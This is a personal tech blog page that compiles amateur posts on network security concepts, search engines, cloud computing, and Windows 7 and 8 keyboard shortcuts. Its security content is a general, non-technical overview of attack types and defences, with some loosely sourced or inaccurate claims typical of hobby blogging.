Saturday, 31 October 2015

NETWORK SECURITY

So coming over topic ,this time I would like to share  the hot one “Network Security” .So let’s get start friends, I hope that you all are now aware about Ethical concept on Hacking, windows basic, keyboard Shortcuts ,Cloud Computing,Serach engine .So, fasten your seat belt  because now i am give you  tips over Network Security .

1. Introduction on Network Security.

2. Attack Trends.

3. Safety Drill.
4. Contact me.
 
As you all know network security has become more important to personal computer users, organizations, and the military. With the advent of the internet, security
became a major concern and the history of security
allows a better understanding of the emergence of
security technology. The internet structure itself
allowed for many security threats to occur. The
architecture of the internet, when modified can
reduce the possible attacks that can be sent across
the network. Knowing the attack methods, allows
for the appropriate security to emerge. Many
businesses secure themselves from the internet by
means of firewalls and encryption mechanisms.
The businesses create an “intranet” to remain
connected to the internet but secured from
possible threats.
The entire field of network security is vast and in an
evolutionary stage. The range of study
encompasses a brief history dating back to
internet’s beginnings and the current development
in network security. In order to understand the
research being performed today, background
knowledge of the internet, its vulnerabilities, attack
methods through the internet, and security
technology is important and therefore they are
reviewed.
of intellectual property that can be easily acquired
through the internet.
There are currently two fundamentally different
networks, data networks and synchronous network
comprised of switches. The internet is considered a
data network. Since the current data network
consists of computer-based routers, information
can be obtained by special programs, such as
“Trojan horses,” planted in the routers. The
synchronous network that consists of switches
does not buffer data and therefore are not
threatened by attackers. That is why security is
emphasized in data networks, such as the internet,
and other networks that link to the internet.
The vast topic of network security is analyzed by
researching the following:
1. History of security in networks
2. Internet architecture and vulnerable
security aspects of the Internet
3. Types of internet attacks and security
methods
4. Security for networks with internet access
5. Current development in network security
hardware and software
Based on this research, the future of network
security is forecasted. New trends that are
emerging will also be considered to understand
where network security is heading.
***************

When developing a secure network, the following
need to be considered :
1. Access – authorized users are provided the
means to communicate to and from a
particular network.
2. Confidentiality – Information in the network
remains private.
3. Authentication – Ensure the users of the network are who they say they are4. Integrity – Ensure the message has not
been modified in transit.
5. Non-repudiation – Ensure the user does not
refute that he used the network.
********************

2. Attack Trends :
When it comes about safety of your databases, then you try to take all types of secure parameters but still let me make you aware about some unwanted attacks that takes place sometimes that causes loss of your databases.
We all know about viruses,spam,junk etc.
But you know how make this attacks ?
Their formation ?
What parameter they use to attack ?
Dn’t worry ,I will explain you everything one by one J

First of all let me tell you that how many types of attacks took place .Generally, different authors, technical experts, blogger have different
Ideas about this topic but I find out that there are mainly two types attacks :
1. Active
2. Passive 
Now the sub parts of active and passive attacks follows:
•Passive attacks
# Interception.
# Release of message contents.
# Traffic analysis.
•Active attacks
# Interruption, modification, fabrication.
# Masquerade.
# Replay.
# Modification.
# Denial of service.
#exploiting passwords and poor configurations.
# Software bugs.
# Trojan horses.
# Sniffers.
# IP address spoofing.
# Toolkits.
# Distributed attacks.

Eavesdropping
Interception of communications by an
unauthorized party is called eavesdropping. Passive
eavesdropping is when the person only secretly
listens to the networked messages. On the other
hand, active eavesdropping is when the intruder
listens and inserts something into the
communication stream. This can lead to the
messages being distorted. Sensitive information
can be stolen this way.
***************
Viruses
Viruses are self‐replication programs that use files
to infect and propagate . Once a file is opened,
the virus will activate within the system.
********
Worms
A worm is similar to a virus because they both are
self‐replicating, but the worm does not require a
file to allow it to propagate . There are two main
types of worms, mass‐mailing worms and networkaware
worms. Mass mailing worms use email as a
means to infect other computers. Network‐aware
worms are a major problem for the Internet. A
network‐aware worm selects a target and once the
worm accesses the target host, it can infect it by
means of a Trojan or otherwise.
***********
Trojans
Trojans appear to be benign programs to the user,
but will actually have some malicious purpose.
Trojans usually carry some payload such as a virus.
************
Phishing
Phishing is an attempt to obtain confidential
information from an individual, group, or
organization . Phishers trick users into disclosing
personal data, such as credit card numbers, online
banking credentials, and other sensitive
information.
********
IP Spoofing Attacks
Spoofing means to have the address of the
computer mirror the address of a trusted computer
in order to gain access to other computers. The
identity of the intruder is hidden by different
means making detection and prevention difficult.
With the current IP protocol technology, IPspoofed
packets cannot be eliminated.
***********
Denial of Service
Denial of Service is an attack when the system
receiving too many requests cannot return
communication with the requestors . The
system then consumes resources waiting for the
handshake to complete. Eventually, the system
cannot respond to any more requests rendering it
without service.
*********

3. Safety Drill :
The best part of network security is Cryptography:
Cryptography (or cryptology; from Greek κρυπτός, "hidden, secret"; and γράφειν, graphein, "writing", or -λογία, -logia, "study", respectively) is the practice and study of techniques for secure communication in the presence of third parties (called adversaries).More generally, it is about constructing and analyzing protocols that overcome the influence of adversaries and which are related to various aspects in information security such as data confidentiality, data integrity, authentication and non-repudiation. Modern cryptography intersects the disciplines of mathematics, computer science, and electrical engineering. Applications of cryptography include ATM cards, computer passwords, and electronic commerce.
(Source: WIkiPediA)
This is a pdf file which explain the concept of cryptography.
http://www.cs.iit.edu/~cs549/lectures/CNS-1.pdf

2.2.2 Firewall
A firewall is a typical border control mechanism or
perimeter defense. The purpose of a firewall is to
block traffic from the outside, but it could also beused to block traffic from the inside. A firewall is
the front line defense mechanism against
intruders. It is a system designed to prevent
unauthorized access to or from a private network.
Firewalls can be implemented in both hardware
and software, or a combination of both.
**********
Intrusion Detection Systems
An Intrusion Detection System (IDS) is an additional
protection measure that helps ward off computer
intrusions. IDS systems can be software and
hardware devices used to detect an attack. IDS
products are used to monitor connection in
determining whether attacks are been launched.
Some IDS systems just monitor and alert of an
attack, whereas others try to block the attack.
************
Anti‐Malware Software and scanners
Viruses, worms and Trojan horses are all examples
of malicious software, or Malware for short. Special
so‐called anti‐Malware tools are used to detect
them and cure an infected system.
**********

Secure Socket Layer (SSL)
The Secure Socket Layer (SSL) is a suite of protocols
that is a standard way to achieve a good level of
security between a web browser and a website. SSL
is designed to create a secure channel, or tunnel,
between a web browser and the web server, so
that any information exchanged is protected within
the secured tunnel. SSL provides authentication of
clients to server through the use of certificates.
Clients present a certificate to the server to prove
their identity
(Need to work on this topic, please give some reference regarding SSL)

Sources for writing this Topic :
1.Internet Sources:
·Wikipedia
·google
· www.redhat.com/docs/manuals/enterprise/RHEL‐4‐
Manual/security‐guide/ch‐sgs‐ov.html
·ethicalhacking1.com
·TOI
2.Books:
· Dowd, P.W.; McHenry, J.T., "Network security: it's
  time to take it seriously," Computer, vol.31
· CS595-Cryptography and Network Security
And Self sources ,friends and a lot from News and Magazines…

Searching engine

1. Introduction on Search Engine .

2. Types of Search Engine.

3. Features of Search Engine  .

4. Popular Search Engine . 

5. Blocked Web sites in india.

6. Search Engine Optimization

7. Contact me.

 
There are many definition of Search Engines on Index basis,diiferent person have different ideas .Let's check it out.
A search engine is a tool that allows a user to enter keywords and retrieve information on websites contained in its catalog or database
or
a program that searches for and identifies items in a database that correspond to keywords or characters specified by the user, used especially for finding particular sites on the Internet.
or
Search engines are programs that search documents for specified keywords and returns a list of the documents where the keywords were found. A search engine is really a general class of programs, however, the term is often used to specifically describe systems like Google, Bing and Yahoo! Search that enable users to search for documents on the World Wide Web.
or
Simply i define it "To access information from source is called search engine".

2. Types of Search Engine :

   There are different forms of search engines like web search engines, selection-based search engines, metasearch engines, desktop search tools, and web portals and vertical market websites that have a search facility for online databases.
so let's discuss about different forms of search engines and their properties .

·       Web Search Engine :

Typically, Web search engines work by sending out a spider to fetch as many documents as possible. Another program, called an indexer, then reads these documents and creates an index based on the words contained in each document. Each search engine uses a proprietary algorithm to create its indices such that, ideally, only meaningful results are returned for each query or you can say It  is a software system that is designed to search for information on the World Wide Web.

·       selection-based search engines :

selection-based search enables users to launch a search query by selecting text on any application on his desktop. It is commonly believed that selection-based search lowers the user barrier to search and permits an incremental number of searches per user per day.[2] Selection-based search systems also operate on the premise that users value information in context. They may save the user from having to juggle multiple applications, multiple web browsers or use multiple search engines separately.
The term selection-based search is frequently used to classify a set of search engine systems, including a desktop client and a series of cloud computing services, but is also used to describe the paradigm of categorizing a keyword and searching multiple data sources using only the mouse. The National Information Standards Organization (NISO) uses the terms selection-based search and mouse-based search interchangeably to describe this web search paradigm.

·       Metasearch Engines:

A metasearch engine is a search tool that sends user requests to several other search engines and/or databases and aggregates the results into a single list or displays them according to their source. Metasearch engines enable users to enter search criteria once and access several search engines simultaneously. Metasearch engines operate on the premise that the Web is too large for any one search engine to index it all and that more comprehensive search results can be obtained by combining the results from several search engines. This also may save the user from having to use multiple search engines separately.
Metasearch engines create what is known as a virtual database. They do not compile a physical database or catalogue of the web. Instead, they take a user's request, pass it to several other heterogeneous databases and then compile the results in a homogeneous manner based on a specific algorithm. The first commercial meta search engine was created by Herman Tumurcuoglu in Montreal, Quebec in 1996. It was dubbed the mother of all search engines Mamma.com

3. Features of Search Engine:
·       A ture Search engine provides all sub information regarding given quary.
·       A true search engine is an automated software
program that moves around the Web collecting
WebPages to include in its catalog or database.
·       It searches when an user requests information from a
search engine; not the entire Web.
·       Each search engine has its own catalog or database of
collected WebPages, so you will get different
results/hits by using different search engines.
·       A search engine type is determined by how
the information contained in its catalog or
database is collected
·       Some search directories or indexes do not consider content
when adding pages to their catalog. Others collect, rate or
rank materials. Some search directories include annotations
that evaluate, review, or otherwise describe the content.

4. Popular Search Engine :
As through my knowledge there are more then 100+ search engines in which they provide different specialty like some in science, business, sports, entertarment etc.
Now talking about popular search engine including Meta search engine around the globe.
Google
Yahoo!
Baidu
Bing
Soso.com          
Blekko     
DuckDuckGo   
Exalead    
Gigablast 
Sogou      
Volunia   
Yandex    
Youdao
Rediff
Blingo      
Yippy (formerly Clusty)    
DeeperWeb       
Dogpile    
Excite      
Harvester42      
HotBot
Info.com  
Ixquick (StartPage)   
Kayak and SideStep  
Mamma   
Metacrawler      
Mobissimo        
Otalo        
PCH Search and Win
WebCrawler     
Fewclick Search
        

5. Blocked Websites in India:
Still working on this topic but a little information about blocked websites in India. Sometime we think that whole site is blocked over a country but generally some part restrict over that particular website or you can say banned over that country.
For e.g. Google is going to take strict action against Australia over sexual and abusive harassment, so they are planning to block YouTube and G mail facility in Australia. 
Now Talking about Google :
Google is banned in China and Pakistan because of adult and sensitive search including Gmail,Hangouts,Orkut,youtube as well as Android.
Facebook blocks over North Korea, China, Iran, and Cuba.
Twitter blocks over UAE, Pakistan, China, and Iran.
And many more ,now talking about India then here what I found about the censorship of websites list:
http://en.wikipedia.org/wiki/Internet_censorship_in_India
http://censorship.wikia.com/wiki/List_of_Sites_Banned_in_India

6. Search Engine Optimization:

http://static.googleusercontent.com/media/www.google.co.jp/ja/jp/intl/en/webmasters/docs/search-engine-optimization-starter-guide.pdf
Sources for writing this Blog:
1.Internet Sources:
·Wikipedia
·Apple.inc
·Google
·teacherlink.edu
·      unco.edu
·TOI

2.Books:
· 1.Google Semetric search engine optimization
   2.Programming Collective Intelligence -Segaran
And Self sources ,friends and a lot from News and Magazines…

Cloud computing

Cloud Computing
Hello everyone, I Sourav Poddar here once again to show you some basic tips n tricks. In this time ,I am over pleased to see an excellent response and appreciation  on my blog, I got many feedbacks and suggestions on blog,mail,facebook .I crossed  500+ visitors in these days, it’s like a big celebration for me .Thank you all for appreciating it.
So before writing my fourth blog, I would like to share something I experience these days.
“Days are going quite busy, having no time to be social
  Nuts cracking under feet, Stumbled over busy life”
Unfortunately feeling sorry for coming back after a long time, I was just busy in my schedule. I tried so many times to give response on blog, emails, face book etc. Feeling sorry for all and especially Robin Thompson.
Time binds me harder; I would like to thank Alex Blaszczuk (one of my close friend through apple developer) for providing me such strength this time
And told me to write on interesting topics.
Hope that I will try my best…..
So coming over hot topics now a days ,I would like to share topic “cloud computing” .So let’s get start friends, I hope that you all are now aware about Ethical concept on Hacking, windows basic .So, now i am going to show you  Tips n Tricks for Cloud Computing.   
1. Introduction on cloud computing.
2. Cloud Architecture.
3. Types of cloud computing.
4. Cloud vs Grid computing.
5.  Benefits of Cloud computing.
6. Applications of cloud computing.
7. Services of cloud computing.
8. Contact me.

During my school days, our science teacher teach us that there are billions of bacteria is present in this classroom, so I made a clear definition from
That point of view  “i think that we are surrounded by binary and decimal codes in this atmosphere which connects each of us”
so i think cloud computing is everywhere. Pick up any tech magazine or visit almost any IT
website or blog and you’ll be sure to see talk about cloud computing. The only
problem is that not everyone agrees on what it is. Ask different professionals
what cloud computing is, and you’ll get ten different answers. And is cloud computing
even worth all the hype? Some people don’t think so. I just read out somewhere that in 2008 Oracle CEO Larry
Ellison chastised the whole issue of cloud computing, saying that the term was overused
and being applied to everything in the computer world.
“The computer industry is the only industry that is more fashion-driven than women’s
fashion,” he said to a group of Oracle analysts :P

So let’s talk about that what cloud computing is and tighten up our definition and
understanding of this implementation.
The term "cloud" is analogical to "Internet". The term "Cloud Computing" is based on cloud drawings used in the
past to represent telephone networks and later to depict Internet in .
Cloud computing is Internet based computing where virtual shared servers provide software, infrastructure, platform,
devices and other resources and hosting to customers on a pay-as-you-use basis. All information that a digitized
system has to offer is provided as a service in the cloud computing model. Users can access these services available
on the "Internet cloud" without having any previous know-how on managing the resources involved. Thus, users
can concentrate more on their core business processes rather than spending time and gaining knowledge on resources
needed to manage their business processes.
Cloud computing customers do not own the physical infrastructure; rather they rent the usage from a third-party
provider. This helps them to avoid huge . They consume resources as a service and pay only for resources that they
use. Most cloud computing infrastructures consist of services delivered through common centres and built on servers.
Sharing resources among can improve, as servers are not unnecessarily left idle, which can reduce costs significantly
while increasing the speed of application development.

But there’s more going on under the hood than to simply equate cloud computing to the
Internet. In essence, cloud computing is a construct that allows you to access applications
that actually reside at a location other than your computer or other Internet-connected
device; most often, this will be a distant datacenter. There are many benefits to this. For
instance, think about the last time you bought Microsoft Word and installed it on your
computers. Either you ran around with a CD- or DVD-ROM and installed it
on all the computers, or you set up your software distribution servers to automatically
install the application on your machines. And every time Microsoft issued a service pack,
you had to go around and install that pack, or you had to set up your software distribution
servers to distribute it. Oh, and don’t forget the cost of all the licenses. Pete down the hall
probably uses Word once a month, but his license cost just as much as everyone else’s.
The beauty of cloud computing, is that another company hosts
your application (or suite of applications, for that matter). This means that they handle the
costs of servers, they manage the software updates, and depending on how you craft your
contract you pay less for the service.
Don’t forget the equipment that you won’t need to buy which will result in fewer
capital expenditures thereby causing the CFO to actually smile when she sees you. By
having someone else host the applications, you need not buy the servers nor pay for the
electricity to power and cool them.
It’s also convenient for telecommuters and traveling remote workers, who can simply
log in and use their applications wherever they are.
Internet
Router
Switch
Client PCs
Server

2. Cloud Architecture:
In a simple, topological sense, a cloud computing solution is made up of several elements:
*clients
*the datacenter
and distributed servers. These components
make up the three parts of a cloud computing solution.
Each element has a purpose and plays a specific role in delivering a functional cloudbased
application, so let’s take a closer look.
*Internet
*Client computers
*Distributed servers
Cloud computing architecture consists of two components "the front end" and "the back end". The front end of the
cloud computing system comprises the client's device (or it may be computer network) and some applications are
needed for accessing the cloud computing system. Back end refers to the cloud itself which may encompass various
computer machines, data storage systems and servers. Group of these clouds make a whole cloud computing system.
The whole system is administered via a central server that is also used for monitoring client demand and traffic
ensuring smooth functioning of the system. A special type of software called "Middleware" is used to allow computers
that are connected on the network to communicate with each other. Cloud computing systems also must have a
copy of all its clients data to restore the service which may arise due to a device breakdown. Making copy of data
is called redundancy and cloud computing service providers provide data redundancy.

Deployment Models:
There are four different deployment models of cloud computing:
Public Cloud: Public or external cloud is traditional cloud computing where resources are dynamically provisioned
on a fine-grained, self-service basis over the Internet or via and or from an off-site third-party provider who bills
on a fine-grained basis

Community Cloud: If several organizations have similar requirements and seek to share infrastructure to realize
the benefits of cloud computing, then a community cloud can be established. This is a more expensive option
as compared to public cloud as the costs are spread over fewer users as compared to a public cloud. However,
this option may offer a higher level of privacy, security and/or policy compliance.

Hybrid Cloud: Hybrid Cloud means either two separate clouds joined together (public, private, internal or external)
or a combination of virtualized cloud server instances used together with real physical hardware. The most correct
definition of the term "Hybrid Cloud" is probably the use of physical hardware and virtualized cloud server instances
together to provide a single common service. Two clouds that have been joined together are more correctly called
a "combined cloud".
Private Clouds: Private clouds describe offerings that deploy cloud computing on private networks. It consists
of applications or virtual machines in a company's own set of hosts. They provide the benefits of utility computing
-shared hardware costs, the ability to recover from failure, and the ability to scale up or down depending upon
demand.

3. Types of cloud computing:
As we know,there are different forms of cloud computing, but basically there are 5 types of cloud computing as follows:
1. Web-based Cloud
Out of all the types of cloud computing, web-based clouds are the usually the first type people see. Web-based clouds use the internet to offer various services and applications. While all types of cloud computing have the same technology underneath, web clouds use traditional web apps and services to provide the functionality. These services include your web-based email client and apps such as Google Maps and Facebook applications.

2. Software As A Service
Software as a Service, or Saas, is what we all think about when when hear about the types of cloud computing. Software as a service provides traditional desktop applications as internet-based applications. Your provider offers applications such as word processors for you to use with your web browser.

These services are then design so that multiple users can access and edit the same data at the same time. SaaS solutions include such applications as Google Docs.

3. Platform As A Surface
Platform as a service types of cloud computing developed as a need to expand software as a service to include more applications and other customizations. Whereas Sass only offers applications, platform as a service provides computer virtual computers. Your provider just gives you the hardware and maybe the operating system, You supply everything else. Since you use your own software, you get to customize your cloud the way you need it without having to constantly begging your provider for more services. Unfortunately, that also means you need more technical skill to use this type of cloud computing.

4. Utility Clouds
Utility types of cloud computing exists to do just one thing: store stuff. They are more or less virtual drives and not much more. However, if you just need the extra storage or some miscellaneous server option, you may find utility clouds more than useful. They offer fast on demand access to your data and can act as virtual data centers depending on your needs.

5. Managed Services
Of all the types of cloud computing, managed services are the oldest. In this environment, you do not use any cloud application, your service provider does. It is basically the inverse of all the other types of cloud computing. It  is used to provide monitoring services such as antivirus and other security monitoring solutions. Many network proxies fall under this type.

*Service Commerce

Service commerce types of cloud computing combine software as a service with managed services to create the ultimate cloud computing environment. They provide a core set of  SaaS applications that you can use with the added bonus of advanced network and security monitoring solutions.  Common variations include expense tracking, travel  and planning, and virtual assistants.

All six of these types of cloud computing come in public and private flavors depending on who the host is. If you host your own cloud, it is referred to as a private cloud. If you outsource the services as it is usually done, it is called public cloud computing. Either way, the six types of cloud computing are the same. You just need to find the solution that best fits you needs.
5. Cloud vs Grid computing :
Grid Computing
The concept of grid computing is based on the philosophy of information and
electricity sharing, allowing us to access to another kind of
heterogeneous and geographically separated resources
„Grid computing provides the sharing of:
‰* Computational resources
‰ *Storage elements
‰ *Specific applications
‰ *Equipment
‰  Other
„ Thus, Grid is based on:
‰ *Internet protocols
‰ *Ideas of parallel and distributed computing.
    A Three Point Checklist:
„ “A Grid is a system that...
‰ 1) Coordinates resources that are not subject to
        a centralized control.
‰ 2) Using standard, open, general-purpose
         protocols and interfaces.
‰ 3) To deliver nontrivial qualities of services.”
        Flexible, secure, coordinated resource
        sharing among individuals and institutions
„    Enable communities (virtual organizations) to
       share geographically distributed resources in
     order to achieve a common goal
‰  In applications which cannot be solved by
     resources of an only institution
‰ Or the results can be achieved faster and/or cheaper
------------------

Cloud Computing
The concept of Cloud computing is based on the philosophy of information and
electricity sharing, allowing us to access to another kind of
heterogeneous and geographically separated resources.
So can we say that grid is as cloud computing??
– Managed by an organization
• Community cloud
– Shared by several organizations
– Intended to one community
• Public cloud
– General public
– Owned by an organization selling cloud services
• Hybrid cloud
– Composed by two or more clouds
Elasticity: Resource allocation
can be increased or decreased
according to the demand
• Scalability: the cloud scales
according to the demand
• Self-service provisioning: Cloud
customers accesing cloud
services
• Standardized interfaces:
Standard APIs
• Billing service: A pay-as-you-go to model
--------------------
Comparing Grids and Clouds Side-by-Side:
I think there are lots of think to compare between grid and cloud computing,
i think you should better take a look on :
http://arxiv.org/ftp/arxiv/papers/0901/0901.0131.pdf

6. Applications of cloud computing:
The applications of cloud computing are practically limitless. With the right middleware, a cloud computing system could execute all the programs a normal computer could run. Potentially, everything from generic word processing software to customized computer programs designed for a specific company could work on a cloud computing system.
The cloud computing is used in differnent scales:
skype,dropbox,google hangouts, Basecamp,Highrise,Backpack,Evernote,Xero,i cloud

7. Services of cloud computing:
When it comes to cloud computing, this kind of file sharing can be a very unique and interesting method. Instead of the traditional copy and paste methods of adding applications or programs from a flash drive to a computer, this method will allow anyone and everyone with proper information, access to these same files from the internet. These files can be retrieved with ease because it can be accomplished without having to plug in or hook anything up beforehand.
Cloud Computing services are helping many small businesses thrive due to the convenience and of course, efficiency, Cloud computing also offers numerous amount of benefits that are guaranteed to make any business more money. Time is money so if there is something that can make your business run more efficiently, than it will be making your business more money. When searching to see what cloud computing providers Manhattan had to offer for one of my clients' business, this is what I learned about the benefits of cloud marketing services.

So what are the benefits to cloud marketing services?

-It is Faster?

One of the benefits includes having the ability to be able to meet business commands in a quick manner due to the flexibility of the cloud. Instead of taking up all of the bandwidth within a server, you will be able to take up about half of the space, while delivering demands in an instant.

-Disaster Recovery:

Another wonderful perk about this timeless method is that you can finally kiss all of your advanced disaster recovery file plans goodbye. With the cloud service, you'll finally be able to take care of what issues you need to, in record speed, while getting the job done.

-Automatic Updates:

Why should you have to take the time to install all of those important software updates while interrupting your work schedule, when the cloud computing service can do it for you while you work?

-Increased Security:

These service suppliers will make sure that their security updates and regular scans are taken care of, so that it won't take up the customers' time, keeping them away from their other duties.

-Flexibility:

The best part of all is that you can work from anywhere you want! You don't need to worry about fighting travel, or having to worry if you don't make it to work on time for whatever reason. As long as you have a stable internet connection, you can work from anywhere in the world, hassle free!

-Environmentally Friendly Options:

Last but not least, this service is environmentally friendly in the energy consumption department. You can expect to use less than 50% of it's energy in a single usage, while drastically cutting back on carbon emissions.

Sources for writing this E-Book :
1.Internet Sources:
·Wikipedia
· Google cloud storage
·Apple.in
· R. Buyya, D. Abramson, J. Giddy. “Nimrod/G: An Architecture
for a Resource Management and Scheduling System in a Global
Computational Grid”, IEEE Int. Conf. on High Performance
Computing in Asia-Pacific Region (HPC ASIA) 2000.
[8] R. Buyya, K. Bubendorfer. “Market Oriented Grid and Utility
· yozha@microsoft.com
·TOI
2.Books:
· Cloud Computing Explained: Implementation Handbook for Enterprises (John Rhoton)
· Cloud Application Architectures: Building Applications and Infrastructure in the Cloud (George Reese)

And Self sources ,friends and a lot from News and Magazines…

Win7, 8 shortcut

·       Basic shortcut keys for windows 7:
Opens the Start menu
Keystrokes and their Functions
windows key + Keystrokes
·         + E : Opens Computer
·          + R : Opens the Run dialog box
·          + F  : Opens Search
·          + U  : Opens Ease Of Access Center
·          + X  : Open Windows Mobility Center
·          + Ctrl + F : Opens the Find Computers dialog box
·          + Pause/Break : Open the System page
·          + P : Chooses a Network Projector presentation display mode
·          + 1..0 : Launches a program pinned on the Taskbar in the position indicated by the
·         number; or accesses a running program on the Taskbar in the position
·         indicated by the number
·          + Shift + 1..0 : Launches a new instance of a program pinned on the Taskbar in the position indicated by the number
·          + Ctrl + 1..0 : Accesses the last active instance of a program pinned on the Taskbar in the position indicated by the number
·          + Alt + 1..0 :Accesses the Jump List of a program pinned on the Taskbar in the position indicated by the number
·          + B : Selects the first item in the Notification Area; use the arrow keys to cycle
·through the items and press Enter to open the selected item.
·         + Ctrl + B : Accesses the program that is displaying a message in the Notification Area
·          + T  : Cycles through the items on the Taskbar
·          + M  : Minimizes all windows
·          + Shift + M : Restores all minimized windows
·          + D  Show/Hide : Desktop (minimizes/restores all windows)
·          + L  : Locks the computer
·          + Tab :Accesses Windows Flip 3D and cycles forward through open programs
·          + Shift + Tab : Accesses Windows Flip 3D and cycles backward through open programs
·          + Ctrl + Tab : Opens Windows Flip 3D as a stationary object; use the arrow keys to cycle through open programs and press Enter to access the selected program.
·          + Spacebar : Preview Desktop (makes all open windows transparent)
·          + G :Cycles through gadgets
·          + Up Arrow :  Maximizes the current window
·          + Down Arrow :  Minimizes/restores the current window
·          + Home :  Minimizes all but the current window
·          + Left Arrow : Tiles the window on the left side of the screen
·          + Right Arrow : Tiles the window on the right side of the screen
·          + Shift + Up Arrow : Extends the current window from the top to the bottom of the screen
·          + Shift + Left/Right Arrow : Moves the current window from one monitor to the next
·          + F1 : Launches Windows Help And Support
·         Alt  Displays hidden Menu Bar
·         Alt + D : Selects the Address Bar
·         Alt + P : Displays the Preview Pane in Windows Explorer
·         Alt + Tab:  Cycles forward through open windows
·         Alt + Shift + Tab : Cycles backward through open windows
·         Alt + F4 : Closes the current window; opens the Shut Down Windows dialog box from
·         the Desktop
·         Alt + Spacebar :  Accesses the shortcut menu for the current window
·         Alt + Esc : Cycles between open programs in the order they were opened
·         Alt + Enter : Opens the Properties dialog box of the selected item
·         Alt + PrtScn : Takes a screen shot of the active window and places it on the Clipboard
·         Alt + Up Arrow : Moves up one folder level in Windows Explorer (like the Up Arrow in XP)
·         Alt + Left Arrow : Displays the previous folder
·         Alt + Right Arrow : Displays the next folder
·         Shift + Insert : CD/DVD Loads CD/DVD without triggering Autoplay or Autorun
·         Shift + Delete : Permanently deletes the item (rather than sending it to the Recycle Bin)
·         Shift + F6 : Cycles backward through the elements in a window or dialog box
·         Shift + F10 : Accesses the context menu for the selected item
·        Shift + Tab : Cycles backward through the elements in a window or dialog box
·         Shift + Click : Selects a consecutive group of items
·         Shift + Click : on a Taskbar button Launches a new instance of a program
·         Shift + Right-click on a Taskbar button Accesses the context menu for the selected item
·         Ctrl + A : Selects all items
·         Ctrl + C : Copies the selected item
·         Ctrl + X : Cuts the selected item
·         Ctrl + V : Pastes the selected item
·         Ctrl + D : Deletes the selected item
·         Ctrl + Z : Undoes an action
·         Ctrl + Y : Redoes an action
·         Ctrl + N : Opens a new window in Windows Explorer
·         Ctrl + W : Closes the current window in Windows Explorer
·         Ctrl + E : Selects the Search box in the upper-right corner of a window
·         Ctrl + Shift + N : Creates a new folder
·         Ctrl + Esc : Opens the Start menu
·         Ctrl + Shift + Esc : Opens the Windows Task Manager
·         Ctrl + Alt + Tab : Uses arrow keys to cycle through open windows
·         Ctrl + Alt + Delete : Accesses the Windows Security screen
·         Ctrl + Mouse scroll wheel Changes the icon size on the desktop or the Views setting in Windows
·         Explorer
·         Ctrl + Click : Selects multiple individual items
·         Ctrl + Click and drag an item Copies that item in the same folder
·         Ctrl + Shift + Click and drag an item
·         Creates a shortcut for that item in the same folder
·         Ctrl + Tab Moves forward through tabs
·         Ctrl + Shift + Tab Moves backward through tabs
·         Ctrl + Shift + Click on a Taskbar button Launches a new instance of a program as an Administrator
·         Ctrl + Click on a grouped Taskbar button Cycles through the instances of a program in the group
·         F1 : Displays Help
·         F2  : Renames a file
·         F3 : Opens Search
·         F4  : Displays the Address Bar list
·         F5  : Refreshes the display
·         F6  : Cycles forward through the elements in a window or dialog box
·         F7  : Displays the command history in a Command Prompt
·         F10 : Displays hidden Menu Bar
·         F11 : Toggles full screen display
·         Tab  : Cycles forward through the elements in a window or dialog box
·         PrtScn : Takes a screen shot of the entire screen and places it on the Clipboard
·          (Application Key)
·         Accesses the context menu for the selected item
·         Home : Moves to the top of the active window
·         End  : Moves to the bottom of the active window
·         Delete:  Deletes the selected item
·         Backspace : Displays the previous folder in Windows Explorer; moves up one folder level in the Open or Save dialog box
·         Esc : Closes a dialog box
·         Num Lock Enabled + Plus (+) Displays the contents of the selected folder
·         Num Lock Enabled + Minus (-) Collapses the selected folder
·         Num Lock Enabled + Asterisk (*) Expands all subfolders under the selected folder
·         Press Shift 5 times Turns StickyKeys on or off
·         Hold down right Shift for 8 seconds
·         Turns FilterKeys on or off
·         Hold down Num Lock for 5 seconds
·         Turns ToggleKeys on or off
·********************************

·       Basic shortcut keys for windows 8:
Windows : Switch between Metro Start screen and the last accessed application
Keystrokes and their Functions
windows key +  keystrokes

·          + C : Access the charms bar
·          + Tab : Access the Metro Taskbar
·          + I : Access the Settings charm
·          + H : Access the Share charm
·          + K : Access the Devices charm
·          + Q : Access the Apps Search screen
·          + F : Access the Files Search screen
·          + W : Access the Settings Search screen
·          + P : Access the Second Screen bar
·          + Z : Brings up the App Bar when you have a Metro App running
·          + X : Access the Windows Tools Menu
·          + O : Lock screen orientation
·          + . : Move the screen split to the right
·          + Shift + . : Move the screen split to the left
·          + V : View all active Toasts/Notifications
·          + Shift + V : View all active Toasts/Notifications in reverse order
·          + PrtScn Takes a screenshot of the screen and automatically saves it in the Pictures folder as
·         Screenshot (#)—incrementing the # with each successive screenshot
·          + Enter : Launch Narrator
·         PageUp : Scroll forward on the Metro Start screen
·         PageDown : Scroll backward on the Metro Start screen
·         Esc : Close a charm
·         Ctrl + Esc : Switch between Metro Start screen and the last accessed application
·         Ctrl + Mouse scroll wheel Activate the Semantic Zoom on the Metro screen
· + E Open Computer
·          + R : Open the Run dialog box
·          + U :  Open Ease of Access Center
·          + Ctrl + F : Open Find Computers dialog box
·          + Pause/Break : Open the System page
·          + 1..10 :Launch a program pinned on the Taskbar in the position indicated by the number
·         Or, access a running program on the Taskbar in the position indicated by the number
·          + Shift + 1..10 : Launch a new instance of a program pinned on the Taskbar in the position indicated by the  number
·          + Ctrl + 1..10 : Access the last active instance of a program pinned on the Taskbar in the position indicated by the number
·          + Alt + 1..10 : Access the Jump List of a program pinned on the Taskbar in the position indicated by the number
·          + B : Select the first item in the Notification Area and then use the arrow keys to cycle through the
·         items Press Enter to open the selected item
·          + Ctrl + B : Access the program that is displaying a message in the Notification Area
·          + T : Cycle through the items on the Taskbar
·          + M : Minimize all windows
·          + Shift + M : Restore all minimized windows
·          + D :  Show/Hide Desktop (minimize/restore all windows)
·          + L : Lock computer
·          + Up Arrow : Maximize current window
·          + Down Arrow : Minimize/restore current window
·          + Home Minimize:  all but the current window
·          + Left Arrow :Tile window on the left side of the screen
·          + Right Arrow : Tile window on the right side of the screen
·          + Shift + Up Arrow :  Extend current window from the top to the bottom of the screen
·          + Shift + Left/Right Arrow : Move the current window from one monitor to the next
·          + F1 : Launch Windows Help and Support
·         Alt Display a hidden Menu Bar
·         Alt + D : Select the Address Bar
·         Alt + P : Display the Preview Pane in Windows Explorer
·         Alt + Tab : Cycle forward through open windows
·         Alt + Shift + Tab : Cycle backward through open windows
·         Close the current window
·         Open the Shut Down Windows dialog box from the Desktop
·         Alt + Spacebar : Access the Shortcut menu for current window
·         Alt + Esc : Cycle between open programs in the order that they were opened
·         Alt + Enter : Open the Properties dialog box of the selected item
